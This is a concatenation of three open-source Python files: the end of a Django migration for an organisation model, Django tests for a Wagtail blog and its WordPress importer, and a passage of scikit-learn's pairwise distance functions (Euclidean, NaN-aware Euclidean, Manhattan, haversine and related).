'departamento': ('smart_selects.db_fields.ChainedForeignKey', [], {'to': u"orm['lugar.Departamento']"}),
'direccion': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'font_color': ('mapeo.models.ColorField', [], {'unique': 'True', 'max_length': '10', 'blank': 'True'}),
'fundacion': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'generalidades': ('ckeditor.fields.RichTextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': (u'sorl.thumbnail.fields.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'municipio': ('smart_selects.db_fields.ChainedForeignKey', [], {'to': u"orm['lugar.Municipio']"}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'pais': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['lugar.Pais']"}),
'plataforma': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Plataforma']"}),
'rss': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'sector': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.Sector']"}),
'siglas': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'sitio_accion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['configuracion.SitioAccion']"}),
'sitio_web': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'telefono': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'temas': ('ckeditor.fields.RichTextField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['analisis']
|
{
"content_hash": "d768cfccd29ff5565ba150a2af6030e4",
"timestamp": "",
"source": "github",
"line_count": 824,
"max_line_length": 187,
"avg_line_length": 63.599514563106794,
"alnum_prop": 0.5938060527420524,
"repo_name": "shiminasai/ciat_plataforma",
"id": "654ca43f4dda5773dd2c61d780ea313a0140a1bf",
"size": "52430",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "analisis/analisis/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "471726"
},
{
"name": "HTML",
"bytes": "1796979"
},
{
"name": "JavaScript",
"bytes": "1492281"
},
{
"name": "Python",
"bytes": "3447075"
}
],
"symlink_target": ""
}
|
from django.test import TestCase
import json
from django_comments_xtd.models import XtdComment
from wagtail.wagtailcore.models import Page
from django.contrib.auth.models import User
from .models import (BlogPage, BlogTag, BlogPageTag, BlogIndexPage,
BlogCategory, BlogCategoryBlogPage)
from .management.commands.wordpress_to_wagtail import Command
class BlogTests(TestCase):
    """Integration tests for the blog index page and the WordPress importer."""

    def setUp(self):
        # Hang a fresh BlogIndexPage off Wagtail's default 'home' page so
        # every test starts from a known page tree and owner.
        home = Page.objects.get(slug='home')
        self.user = User.objects.create_user('test', 'test@test.test', 'pass')
        self.blog_index = home.add_child(instance=BlogIndexPage(
            title='Blog Index', slug='blog', search_description="x",
            owner=self.user))

    def test_index(self):
        """The blog index serves HTTP 200 and renders a child blog page."""
        url = self.blog_index.url
        res = self.client.get(url)
        self.assertEqual(res.status_code, 200)
        blog_page = self.blog_index.add_child(instance=BlogPage(
            title='Blog Page', slug='blog_page1', search_description="x",
            owner=self.user))
        url = blog_page.url
        res = self.client.get(url)
        self.assertContains(res, "Blog Page")

    def test_import(self):
        """
        Tests migrate_wordpress command -
        the command should do the following:
        1. create BlogPage objects from a given BlogIndex
        2. create category and tag objects as BlogCategory,
           BlogTag, BlogPageBlogCategory and BlogPageTag objects
        The test imports from test-data.json which includes one wordpress blog
        post with 11 tags and 2 categories
        """
        command = Command()
        command.username = None
        command.password = None
        command.should_import_comments = True
        command.blog_to_migrate = 'just_testing'
        with open('test-data.json') as test_json:
            posts = json.load(test_json)
        command.create_blog_pages(posts, self.blog_index)
        # assertEquals is a deprecated unittest alias (removed in Python
        # 3.12); use assertEqual throughout.
        self.assertEqual(Page.objects.all().count(), 4)
        self.assertEqual(BlogPage.objects.all().count(), 1)
        page = BlogPage.objects.get()
        self.assertEqual(page.title, "My wordpress title")
        self.assertInHTML("<strong>Bold here</strong>", page.body)
        self.assertEqual(page.categories.count(), 2)
        self.assertEqual(page.tags.count(), 11)
        self.assertEqual(page.owner.id, 2)
        self.assertEqual(BlogCategory.objects.all().count(), 2)
        self.assertEqual(BlogTag.objects.all().count(), 11)
        self.assertEqual(BlogCategoryBlogPage.objects.all().count(), 2)
        self.assertEqual(BlogPageTag.objects.all().count(), 11)
        parent_category = BlogCategory.objects.get(slug="writing-wisdom")
        child_category = BlogCategory.objects.get(slug="swoon-reads")
        self.assertEqual(child_category.parent, parent_category)
        self.assertEqual(child_category.slug, "swoon-reads")
        self.assertEqual(parent_category.slug, "writing-wisdom")
        comments = XtdComment.objects.all()
        self.assertEqual(comments.count(), 2)
        parent_comment = XtdComment.objects.get(level=0)
        child_comment = XtdComment.objects.get(level=1)
        self.assertEqual(parent_comment.id, child_comment.parent_id)
|
{
"content_hash": "4f76f4c9307c35f0418d6d065455ca66",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 78,
"avg_line_length": 45.98571428571429,
"alnum_prop": 0.6595215905560733,
"repo_name": "geminibleep/myblog",
"id": "4ca291631aad1beb6ebe68caf7edfcfdfa29bce7",
"size": "3219",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blog/tests.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "4626"
},
{
"name": "Python",
"bytes": "43117"
}
],
"symlink_target": ""
}
|
import itertools
from functools import partial
import warnings
import numpy as np
from scipy.spatial import distance
from scipy.sparse import csr_matrix
from scipy.sparse import issparse
from joblib import Parallel, effective_n_jobs
from ..utils.validation import _num_samples
from ..utils.validation import check_non_negative
from ..utils import check_array
from ..utils import gen_even_slices
from ..utils import gen_batches, get_chunk_n_rows
from ..utils import is_scalar_nan
from ..utils.extmath import row_norms, safe_sparse_dot
from ..preprocessing import normalize
from ..utils._mask import _get_mask
from ..utils.fixes import delayed
from ..utils.fixes import sp_version, parse_version
from ._pairwise_fast import _chi2_kernel_fast, _sparse_manhattan
from ..exceptions import DataConversionWarning
# Utility Functions
def _return_float_dtype(X, Y):
"""
1. If dtype of X and Y is float32, then dtype float32 is returned.
2. Else dtype float is returned.
"""
if not issparse(X) and not isinstance(X, np.ndarray):
X = np.asarray(X)
if Y is None:
Y_dtype = X.dtype
elif not issparse(Y) and not isinstance(Y, np.ndarray):
Y = np.asarray(Y)
Y_dtype = Y.dtype
else:
Y_dtype = Y.dtype
if X.dtype == Y_dtype == np.float32:
dtype = np.float32
else:
dtype = float
return X, Y, dtype
def check_pairwise_arrays(
    X,
    Y,
    *,
    precomputed=False,
    dtype=None,
    accept_sparse="csr",
    force_all_finite=True,
    copy=False,
):
    """Validate X and Y for a pairwise-distance computation.

    If Y is None it is set as a pointer to X (no copy); otherwise both
    arrays are validated independently. Validation converts each input to
    an at-least-2-D float array (or the requested ``dtype``) and then
    checks that the second dimensions agree -- or, when ``precomputed`` is
    True, that ``X.shape[1] == Y.shape[0]`` as required for a precomputed
    distance matrix. All distance metrics should call this first to assert
    that the given parameters are correct and safe to use.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples_X, n_features)

    Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)

    precomputed : bool, default=False
        True if X is to be treated as precomputed distances to the samples
        in Y.

    dtype : str, type, list of type, default=None
        Data type required for X and Y. If None, an appropriate float type
        is selected by _return_float_dtype.

        .. versionadded:: 0.18

    accept_sparse : str, bool or list/tuple of str, default='csr'
        Sparse matrix formats accepted by ``check_array``. Sparse input in
        another format is converted to the first listed format. True allows
        any format; False rejects sparse input.

    force_all_finite : bool or 'allow-nan', default=True
        Whether to raise an error on np.inf, np.nan, pd.NA in the arrays:
        True forbids all of them, False allows all of them, and
        'allow-nan' accepts NaN/pd.NA but not infinities.

        .. versionadded:: 0.22
           ``force_all_finite`` accepts the string ``'allow-nan'``.

        .. versionchanged:: 0.23
           Accepts `pd.NA` and converts it into `np.nan`.

    copy : bool, default=False
        Whether a forced copy will be triggered. If copy=False, a copy
        might still be triggered by a conversion.

        .. versionadded:: 0.22

    Returns
    -------
    safe_X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
        An array equal to X, guaranteed to be a numpy array.

    safe_Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
        An array equal to Y if Y was not None; otherwise a pointer to X.

    Raises
    ------
    ValueError
        If the dimensions of X and Y are incompatible.
    """
    X, Y, float_dtype = _return_float_dtype(X, Y)
    if dtype is None:
        dtype = float_dtype
    # Bind the shared validation options once; apply to X and/or Y below.
    validate = partial(
        check_array,
        accept_sparse=accept_sparse,
        dtype=dtype,
        copy=copy,
        force_all_finite=force_all_finite,
        estimator="check_pairwise_arrays",
    )
    if Y is X or Y is None:
        X = Y = validate(X)
    else:
        X = validate(X)
        Y = validate(Y)
    if precomputed:
        if X.shape[1] != Y.shape[0]:
            raise ValueError(
                "Precomputed metric requires shape "
                "(n_queries, n_indexed). Got (%d, %d) "
                "for %d indexed." % (X.shape[0], X.shape[1], Y.shape[0])
            )
    elif X.shape[1] != Y.shape[1]:
        raise ValueError(
            "Incompatible dimension for X and Y matrices: "
            "X.shape[1] == %d while Y.shape[1] == %d" % (X.shape[1], Y.shape[1])
        )
    return X, Y
def check_paired_arrays(X, Y):
    """Validate X and Y for a paired-distance computation.

    All paired distance metrics should call this first. It runs the usual
    pairwise validation (conversion to at-least-2-D float arrays) and then
    additionally requires X and Y to have exactly the same shape, since
    paired metrics compare row i of X with row i of Y.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples_X, n_features)

    Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)

    Returns
    -------
    safe_X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
        An array equal to X, guaranteed to be a numpy array.

    safe_Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
        An array equal to Y if Y was not None; otherwise a pointer to X.

    Raises
    ------
    ValueError
        If X and Y do not have the same shape.
    """
    X, Y = check_pairwise_arrays(X, Y)
    shapes_match = X.shape == Y.shape
    if not shapes_match:
        raise ValueError(
            "X and Y should be of same shape. They were respectively %r and %r long."
            % (X.shape, Y.shape)
        )
    return X, Y
# Pairwise distances
def euclidean_distances(
    X, Y=None, *, Y_norm_squared=None, squared=False, X_norm_squared=None
):
    """Compute the distance matrix between each pair of rows of X and Y.

    Considering the rows of X (and Y=X) as vectors, the euclidean distance
    between a pair of row vectors x and y is computed as::

        dist(x, y) = sqrt(dot(x, x) - 2 * dot(x, y) + dot(y, y))

    This formulation is efficient for sparse data and lets ``dot(x, x)`` /
    ``dot(y, y)`` be pre-computed when one argument stays fixed. It is,
    however, not the most precise way of doing this computation (it can
    suffer from "catastrophic cancellation"), and the returned matrix may
    not be exactly symmetric as required by, e.g.,
    ``scipy.spatial.distance`` functions.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples_X, n_features)

    Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features), \
            default=None
        If `None`, uses `Y=X`.

    Y_norm_squared : array-like of shape (n_samples_Y,) or (n_samples_Y, 1) \
            or (1, n_samples_Y), default=None
        Pre-computed dot-products of vectors in Y (e.g.,
        ``(Y**2).sum(axis=1)``). May be ignored in some cases, see the note
        below.

    squared : bool, default=False
        Return squared Euclidean distances.

    X_norm_squared : array-like of shape (n_samples_X,) or (n_samples_X, 1) \
            or (1, n_samples_X), default=None
        Pre-computed dot-products of vectors in X (e.g.,
        ``(X**2).sum(axis=1)``). May be ignored in some cases, see the note
        below.

    Notes
    -----
    To achieve better accuracy, `X_norm_squared` and `Y_norm_squared` may
    be unused if they are passed as ``float32``.

    Returns
    -------
    distances : ndarray of shape (n_samples_X, n_samples_Y)

    See Also
    --------
    paired_distances : Distances betweens pairs of elements of X and Y.

    Examples
    --------
    >>> from sklearn.metrics.pairwise import euclidean_distances
    >>> X = [[0, 1], [1, 1]]
    >>> # distance between rows of X
    >>> euclidean_distances(X, X)
    array([[0., 1.],
           [1., 0.]])
    >>> # get distance to origin
    >>> euclidean_distances(X, [[0, 0]])
    array([[1.        ],
           [1.41421356]])
    """
    X, Y = check_pairwise_arrays(X, Y)

    def _validated_norms(norms, array, name, as_row):
        # Accept shapes (n,), (n, 1) and (1, n); canonicalize to `target`
        # ((1, n) for Y norms, (n, 1) for X norms) or raise.
        norms = check_array(norms, ensure_2d=False)
        given_shape = norms.shape
        n = array.shape[0]
        target = (1, n) if as_row else (n, 1)
        if norms.shape == (n,):
            norms = norms.reshape(target)
        if norms.shape == target[::-1]:
            norms = norms.T
        if norms.shape != target:
            raise ValueError(
                f"Incompatible dimensions for {name} of shape {array.shape} and "
                f"{name}_norm_squared of shape {given_shape}."
            )
        return norms

    if X_norm_squared is not None:
        X_norm_squared = _validated_norms(X_norm_squared, X, "X", as_row=False)
    if Y_norm_squared is not None:
        Y_norm_squared = _validated_norms(Y_norm_squared, Y, "Y", as_row=True)
    return _euclidean_distances(X, Y, X_norm_squared, Y_norm_squared, squared)
def _euclidean_distances(X, Y, X_norm_squared=None, Y_norm_squared=None, squared=False):
    """Computational part of euclidean_distances.

    Assumes inputs are already checked (see ``check_pairwise_arrays``).

    Uses the expansion ``||x - y||^2 = ||x||^2 - 2 x.y + ||y||^2`` with the
    squared norms ``XX``/``YY`` taken from the precomputed arguments when
    possible.

    If norms are passed as float32, they are unused (set to None below and
    recomputed downstream). If arrays are passed as float32, norms needs to
    be recomputed on upcast chunks.
    TODO: use a float64 accumulator in row_norms to avoid the latter.
    """
    # XX: column vector of squared norms of X's rows, or None to signal that
    # it must be (re)computed in float64 inside _euclidean_distances_upcast.
    if X_norm_squared is not None:
        if X_norm_squared.dtype == np.float32:
            XX = None
        else:
            XX = X_norm_squared.reshape(-1, 1)
    elif X.dtype == np.float32:
        XX = None
    else:
        XX = row_norms(X, squared=True)[:, np.newaxis]
    if Y is X:
        # Same data: reuse X's norms (transposed to a row vector).
        YY = None if XX is None else XX.T
    else:
        # YY: row vector of squared norms of Y's rows, with the same
        # float32-means-recompute convention as XX above.
        if Y_norm_squared is not None:
            if Y_norm_squared.dtype == np.float32:
                YY = None
            else:
                YY = Y_norm_squared.reshape(1, -1)
        elif Y.dtype == np.float32:
            YY = None
        else:
            YY = row_norms(Y, squared=True)[np.newaxis, :]
    if X.dtype == np.float32:
        # To minimize precision issues with float32, we compute the distance
        # matrix on chunks of X and Y upcast to float64
        distances = _euclidean_distances_upcast(X, XX, Y, YY)
    else:
        # if dtype is already float64, no need to chunk and upcast
        distances = -2 * safe_sparse_dot(X, Y.T, dense_output=True)
        distances += XX
        distances += YY
    # The expansion can produce small negative values; clamp them to 0.
    np.maximum(distances, 0, out=distances)
    # Ensure that distances between vectors and themselves are set to 0.0.
    # This may not be the case due to floating point rounding errors.
    if X is Y:
        np.fill_diagonal(distances, 0)
    return distances if squared else np.sqrt(distances, out=distances)
def nan_euclidean_distances(
    X, Y=None, *, squared=False, missing_values=np.nan, copy=True
):
    """Calculate the euclidean distances in the presence of missing values.

    Compute the euclidean distance between each pair of samples in X and Y,
    where Y=X is assumed if Y=None. When calculating the distance between a
    pair of samples, this formulation ignores feature coordinates with a
    missing value in either sample and scales up the weight of the remaining
    coordinates:

        dist(x,y) = sqrt(weight * sq. distance from present coordinates)

    where,

        weight = Total # of coordinates / # of present coordinates

    For example, the distance between ``[3, na, na, 6]`` and ``[1, na, 4, 5]``
    is:

        .. math::
            \\sqrt{\\frac{4}{2}((3-1)^2 + (6-5)^2)}

    If all the coordinates are missing or if there are no common present
    coordinates then NaN is returned for that pair.

    Read more in the :ref:`User Guide <metrics>`.

    .. versionadded:: 0.22

    Parameters
    ----------
    X : array-like of shape=(n_samples_X, n_features)

    Y : array-like of shape=(n_samples_Y, n_features), default=None

    squared : bool, default=False
        Return squared Euclidean distances.

    missing_values : np.nan or int, default=np.nan
        Representation of missing value.

    copy : bool, default=True
        Make and use a deep copy of X and Y (if Y exists).

    Returns
    -------
    distances : ndarray of shape (n_samples_X, n_samples_Y)

    See Also
    --------
    paired_distances : Distances between pairs of elements of X and Y.

    Examples
    --------
    >>> from sklearn.metrics.pairwise import nan_euclidean_distances
    >>> nan = float("NaN")
    >>> X = [[0, 1], [1, nan]]
    >>> nan_euclidean_distances(X, X) # distance between rows of X
    array([[0.        , 1.41421356],
           [1.41421356, 0.        ]])
    >>> # get distance to origin
    >>> nan_euclidean_distances(X, [[0, 0]])
    array([[1.        ],
           [1.41421356]])

    References
    ----------
    * John K. Dixon, "Pattern Recognition with Partly Missing Data",
      IEEE Transactions on Systems, Man, and Cybernetics, Volume: 9, Issue:
      10, pp. 617 - 621, Oct. 1979.
      http://ieeexplore.ieee.org/abstract/document/4310090/
    """
    # NaN can only pass validation when explicitly allowed.
    force_all_finite = "allow-nan" if is_scalar_nan(missing_values) else True
    X, Y = check_pairwise_arrays(
        X, Y, accept_sparse=False, force_all_finite=force_all_finite, copy=copy
    )
    # Get missing mask for X
    missing_X = _get_mask(X, missing_values)
    # Get missing mask for Y (shared with X's mask when Y is X)
    missing_Y = missing_X if Y is X else _get_mask(Y, missing_values)
    # set missing values to zero so they contribute nothing to the dot
    # products inside euclidean_distances
    X[missing_X] = 0
    Y[missing_Y] = 0
    distances = euclidean_distances(X, Y, squared=True)
    # Adjust distances for missing values: after zeroing, a coordinate i
    # missing in y (but present in x) still contributed x_i**2 to the
    # squared distance (and symmetrically y_i**2 for coordinates missing in
    # x); subtract those spurious contributions.
    XX = X * X
    YY = Y * Y
    distances -= np.dot(XX, missing_Y.T)
    distances -= np.dot(missing_X, YY.T)
    # rounding errors in the subtractions may leave tiny negatives
    np.clip(distances, 0, None, out=distances)
    if X is Y:
        # Ensure that distances between vectors and themselves are set to 0.0.
        # This may not be the case due to floating point rounding errors.
        np.fill_diagonal(distances, 0.0)
    # present_count[i, j] = number of coordinates observed in both X[i] and
    # Y[j]; pairs with no common coordinate get a NaN distance.
    present_X = 1 - missing_X
    present_Y = present_X if Y is X else ~missing_Y
    present_count = np.dot(present_X, present_Y.T)
    distances[present_count == 0] = np.nan
    # avoid divide by zero
    np.maximum(1, present_count, out=present_count)
    # rescale: weight = n_features / n_present_coordinates
    distances /= present_count
    distances *= X.shape[1]
    if not squared:
        np.sqrt(distances, out=distances)
    return distances
def _euclidean_distances_upcast(X, XX=None, Y=None, YY=None, batch_size=None):
    """Euclidean distances between X and Y.

    Assumes X and Y have float32 dtype.
    Assumes XX and YY have float64 dtype or are None (in which case the
    squared norms are recomputed per chunk on the upcast data).

    X and Y are upcast to float64 by chunks, which size is chosen to limit
    memory increase by approximately 10% (at least 10MiB).
    """
    n_samples_X = X.shape[0]
    n_samples_Y = Y.shape[0]
    n_features = X.shape[1]
    # Output stays float32; only the per-chunk computation is float64.
    distances = np.empty((n_samples_X, n_samples_Y), dtype=np.float32)
    if batch_size is None:
        # Density factors make the memory estimate account for sparse input.
        x_density = X.nnz / np.prod(X.shape) if issparse(X) else 1
        y_density = Y.nnz / np.prod(Y.shape) if issparse(Y) else 1
        # Allow 10% more memory than X, Y and the distance matrix take (at
        # least 10MiB), measured in 8-byte (float64) blocks: 10 * 2**17
        # blocks == 10 MiB.
        maxmem = max(
            (
                (x_density * n_samples_X + y_density * n_samples_Y) * n_features
                + (x_density * n_samples_X * y_density * n_samples_Y)
            )
            / 10,
            10 * 2 ** 17,
        )
        # The increase amount of memory in 8-byte blocks is:
        # - x_density * batch_size * n_features (copy of chunk of X)
        # - y_density * batch_size * n_features (copy of chunk of Y)
        # - batch_size * batch_size (chunk of distance matrix)
        # Hence x² + (xd+yd)kx = M, where x=batch_size, k=n_features, M=maxmem
        #                                 xd=x_density and yd=y_density
        tmp = (x_density + y_density) * n_features
        # positive root of the quadratic equation above
        batch_size = (-tmp + np.sqrt(tmp ** 2 + 4 * maxmem)) / 2
        batch_size = max(int(batch_size), 1)
    x_batches = gen_batches(n_samples_X, batch_size)
    for i, x_slice in enumerate(x_batches):
        X_chunk = X[x_slice].astype(np.float64)
        if XX is None:
            # norms recomputed in float64 on the upcast chunk for accuracy
            XX_chunk = row_norms(X_chunk, squared=True)[:, np.newaxis]
        else:
            XX_chunk = XX[x_slice]
        y_batches = gen_batches(n_samples_Y, batch_size)
        for j, y_slice in enumerate(y_batches):
            if X is Y and j < i:
                # when X is Y the distance matrix is symmetric so we only need
                # to compute half of it.
                d = distances[y_slice, x_slice].T
            else:
                Y_chunk = Y[y_slice].astype(np.float64)
                if YY is None:
                    YY_chunk = row_norms(Y_chunk, squared=True)[np.newaxis, :]
                else:
                    YY_chunk = YY[:, y_slice]
                # ||x||^2 - 2 x.y + ||y||^2, accumulated in float64
                d = -2 * safe_sparse_dot(X_chunk, Y_chunk.T, dense_output=True)
                d += XX_chunk
                d += YY_chunk
            distances[x_slice, y_slice] = d.astype(np.float32, copy=False)
    return distances
def _argmin_min_reduce(dist, start):
indices = dist.argmin(axis=1)
values = dist[np.arange(dist.shape[0]), indices]
return indices, values
def pairwise_distances_argmin_min(
    X, Y, *, axis=1, metric="euclidean", metric_kwargs=None
):
    """Compute minimum distances between one point and a set of points.

    For each row in X, find the index of the closest row of Y (according to
    the specified metric) together with that minimal distance. This is
    mostly equivalent to calling::

        (pairwise_distances(X, Y=Y, metric=metric).argmin(axis=axis),
         pairwise_distances(X, Y=Y, metric=metric).min(axis=axis))

    but uses much less memory, and is faster for large arrays, because the
    distance matrix is processed in chunks.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
        Array containing points.

    Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features)
        Array containing points.

    axis : int, default=1
        Axis along which the argmin and distances are to be computed.

    metric : str or callable, default='euclidean'
        Metric to use for distance computation. Any metric from scikit-learn
        or scipy.spatial.distance can be used. A callable is invoked on each
        pair of rows and should return their distance; this works for
        Scipy's metrics but is slower than passing a metric name. Distance
        matrices are not supported.

        Valid string values are:

        - from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1',
          'l2', 'manhattan']
        - from scipy.spatial.distance: ['braycurtis', 'canberra',
          'chebyshev', 'correlation', 'dice', 'hamming', 'jaccard',
          'kulsinski', 'mahalanobis', 'minkowski', 'rogerstanimoto',
          'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',
          'sqeuclidean', 'yule']

        See the documentation for scipy.spatial.distance for details on
        these metrics.

    metric_kwargs : dict, default=None
        Keyword arguments to pass to specified metric function.

    Returns
    -------
    argmin : ndarray
        Y[argmin[i], :] is the row in Y that is closest to X[i, :].

    distances : ndarray
        distances[i] is the distance between the i-th row in X and the
        argmin[i]-th row in Y.

    See Also
    --------
    sklearn.metrics.pairwise_distances
    sklearn.metrics.pairwise_distances_argmin
    """
    X, Y = check_pairwise_arrays(X, Y)
    if metric_kwargs is None:
        metric_kwargs = {}
    if axis == 0:
        # reduce along the other axis by swapping the operands
        X, Y = Y, X
    chunked = pairwise_distances_chunked(
        X, Y, reduce_func=_argmin_min_reduce, metric=metric, **metric_kwargs
    )
    index_chunks, value_chunks = zip(*chunked)
    return np.concatenate(index_chunks), np.concatenate(value_chunks)
def pairwise_distances_argmin(X, Y, *, axis=1, metric="euclidean", metric_kwargs=None):
    """Compute minimum distances between one point and a set of points.

    For each row in X, find the index of the closest row of Y (according to
    the specified metric). This is mostly equivalent to calling::

        pairwise_distances(X, Y=Y, metric=metric).argmin(axis=axis)

    but uses much less memory, and is faster for large arrays. This
    function works with dense 2D arrays only.

    Parameters
    ----------
    X : array-like of shape (n_samples_X, n_features)
        Array containing points.

    Y : array-like of shape (n_samples_Y, n_features)
        Arrays containing points.

    axis : int, default=1
        Axis along which the argmin and distances are to be computed.

    metric : str or callable, default="euclidean"
        Metric to use for distance computation. Any metric from scikit-learn
        or scipy.spatial.distance can be used. A callable is invoked on each
        pair of rows and should return their distance; this works for
        Scipy's metrics but is slower than passing a metric name. Distance
        matrices are not supported.

        Valid string values are:

        - from scikit-learn: ['cityblock', 'cosine', 'euclidean', 'l1',
          'l2', 'manhattan']
        - from scipy.spatial.distance: ['braycurtis', 'canberra',
          'chebyshev', 'correlation', 'dice', 'hamming', 'jaccard',
          'kulsinski', 'mahalanobis', 'minkowski', 'rogerstanimoto',
          'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',
          'sqeuclidean', 'yule']

        See the documentation for scipy.spatial.distance for details on
        these metrics.

    metric_kwargs : dict, default=None
        Keyword arguments to pass to specified metric function.

    Returns
    -------
    argmin : numpy.ndarray
        Y[argmin[i], :] is the row in Y that is closest to X[i, :].

    See Also
    --------
    sklearn.metrics.pairwise_distances
    sklearn.metrics.pairwise_distances_argmin_min
    """
    if metric_kwargs is None:
        metric_kwargs = {}
    # Delegate to the argmin+min variant and drop the distances.
    indices, _ = pairwise_distances_argmin_min(
        X, Y, axis=axis, metric=metric, metric_kwargs=metric_kwargs
    )
    return indices
def haversine_distances(X, Y=None):
    """Compute the Haversine distance between samples in X and Y.

    The Haversine (or great circle) distance is the angular distance
    between two points on the surface of a sphere. The first coordinate of
    each point is assumed to be the latitude, the second is the longitude,
    given in radians. The dimension of the data must be 2.

    .. math::
       D(x, y) = 2\\arcsin[\\sqrt{\\sin^2((x1 - y1) / 2)
                                + \\cos(x1)\\cos(y1)\\sin^2((x2 - y2) / 2)}]

    Parameters
    ----------
    X : array-like of shape (n_samples_X, 2)

    Y : array-like of shape (n_samples_Y, 2), default=None

    Returns
    -------
    distance : ndarray of shape (n_samples_X, n_samples_Y)

    Notes
    -----
    As the Earth is nearly spherical, the haversine formula provides a good
    approximation of the distance between two points of the Earth surface,
    with a less than 1% error on average.

    Examples
    --------
    We want to calculate the distance between the Ezeiza Airport
    (Buenos Aires, Argentina) and the Charles de Gaulle Airport (Paris,
    France).

    >>> from sklearn.metrics.pairwise import haversine_distances
    >>> from math import radians
    >>> bsas = [-34.83333, -58.5166646]
    >>> paris = [49.0083899664, 2.53844117956]
    >>> bsas_in_radians = [radians(_) for _ in bsas]
    >>> paris_in_radians = [radians(_) for _ in paris]
    >>> result = haversine_distances([bsas_in_radians, paris_in_radians])
    >>> result * 6371000/1000  # multiply by Earth radius to get kilometers
    array([[    0.        , 11099.54035582],
           [11099.54035582,     0.        ]])
    """
    # imported here to avoid a circular import at module load time
    from ..neighbors import DistanceMetric

    haversine = DistanceMetric.get_metric("haversine")
    return haversine.pairwise(X, Y)
def manhattan_distances(X, Y=None, *, sum_over_features=True):
    """Compute the L1 distances between the vectors in X and Y.

    With ``sum_over_features`` equal to False it returns the componentwise
    distances instead of the summed pairwise distances.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : array-like of shape (n_samples_X, n_features)

    Y : array-like of shape (n_samples_Y, n_features), default=None
        If `None`, uses `Y=X`.

    sum_over_features : bool, default=True
        If True the function returns the pairwise distance matrix, else it
        returns the componentwise L1 pairwise-distances. Not supported for
        sparse matrix inputs.

    Returns
    -------
    D : ndarray of shape (n_samples_X * n_samples_Y, n_features) or \
            (n_samples_X, n_samples_Y)
        If sum_over_features is False shape is
        (n_samples_X * n_samples_Y, n_features) and D contains the
        componentwise L1 pairwise-distances (i.e. absolute difference),
        else shape is (n_samples_X, n_samples_Y) and D contains the
        pairwise L1 distances.

    Notes
    -----
    When X and/or Y are CSR sparse matrices and they are not already in
    canonical format, this function modifies them in-place to make them
    canonical.

    Examples
    --------
    >>> from sklearn.metrics.pairwise import manhattan_distances
    >>> manhattan_distances([[3]], [[3]])
    array([[0.]])
    >>> manhattan_distances([[3]], [[2]])
    array([[1.]])
    >>> manhattan_distances([[2]], [[3]])
    array([[1.]])
    >>> manhattan_distances([[1, 2], [3, 4]],\
         [[1, 2], [0, 3]])
    array([[0., 2.],
           [4., 4.]])
    >>> import numpy as np
    >>> X = np.ones((1, 2))
    >>> y = np.full((2, 2), 2.)
    >>> manhattan_distances(X, y, sum_over_features=False)
    array([[1., 1.],
           [1., 1.]])
    """
    X, Y = check_pairwise_arrays(X, Y)
    any_sparse = issparse(X) or issparse(Y)
    if any_sparse:
        if not sum_over_features:
            raise TypeError(
                "sum_over_features=%r not supported for sparse matrices"
                % sum_over_features
            )
        X = csr_matrix(X, copy=False)
        Y = csr_matrix(Y, copy=False)
        # canonicalize: merge duplicate entries and sort indices in-place
        X.sum_duplicates()
        Y.sum_duplicates()
        result = np.zeros((X.shape[0], Y.shape[0]))
        _sparse_manhattan(X.data, X.indices, X.indptr, Y.data, Y.indices, Y.indptr, result)
        return result
    if sum_over_features:
        # dense summed case: delegate to scipy's C implementation
        return distance.cdist(X, Y, "cityblock")
    # componentwise case: broadcast to (n_X, n_Y, n_features), take |diff|
    diff = X[:, np.newaxis, :] - Y[np.newaxis, :, :]
    np.abs(diff, out=diff)
    return diff.reshape((-1, X.shape[1]))
def cosine_distances(X, Y=None):
    """Compute cosine distance between samples in X and Y.

    Cosine distance is defined as 1.0 minus the cosine similarity.

    Read more in the :ref:`User Guide <metrics>`.

    Parameters
    ----------
    X : {array-like, sparse matrix} of shape (n_samples_X, n_features)
        Matrix `X`.

    Y : {array-like, sparse matrix} of shape (n_samples_Y, n_features), \
            default=None
        Matrix `Y`.

    Returns
    -------
    distance matrix : ndarray of shape (n_samples_X, n_samples_Y)

    See Also
    --------
    cosine_similarity
    scipy.spatial.distance.cosine : Dense matrices only.
    """
